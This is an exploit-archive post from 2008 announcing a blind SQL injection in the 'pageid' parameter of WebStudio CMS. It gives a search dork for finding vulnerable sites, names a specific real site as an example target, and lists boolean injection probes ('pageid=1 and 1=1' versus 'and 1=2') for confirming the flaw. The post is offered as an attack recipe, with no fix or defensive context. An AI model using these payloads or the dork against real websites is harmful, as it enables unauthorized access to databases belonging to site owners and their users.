id: 4262
date: 11/26/2008
title: WebStudio CMS (pageid) Remote Blind SQL Injection Vuln (mil mixup)
author: BorN To K!LL
cves: 

==================================================================
WebStudio CMS (pageid) Remote Blind SQL Injection Vuln (mil mixup)
==================================================================


submitted: 09/01/2008 10:01 AM
-----------------------------------------------------------------------------------
Scr!pt     : WebStudio CMS

V3rs!0n   : >!<

S!t3        : http://www.bdigital.biz/?pageid=214

Dork       : Powered by WebStudio

Auth0r    : BorN To K!LL
-----------------------------------------------------------------------------------

Exploit    :

/index.php?pageid=[Blind SQL]

Compression :

index.php?pageid=1 and 1=1     <<<<< True

index.php?pageid=1 and 1=2     <<<<< False

-----------------------------------------------------------------------------------



#  0day.today [2023-03-23]  #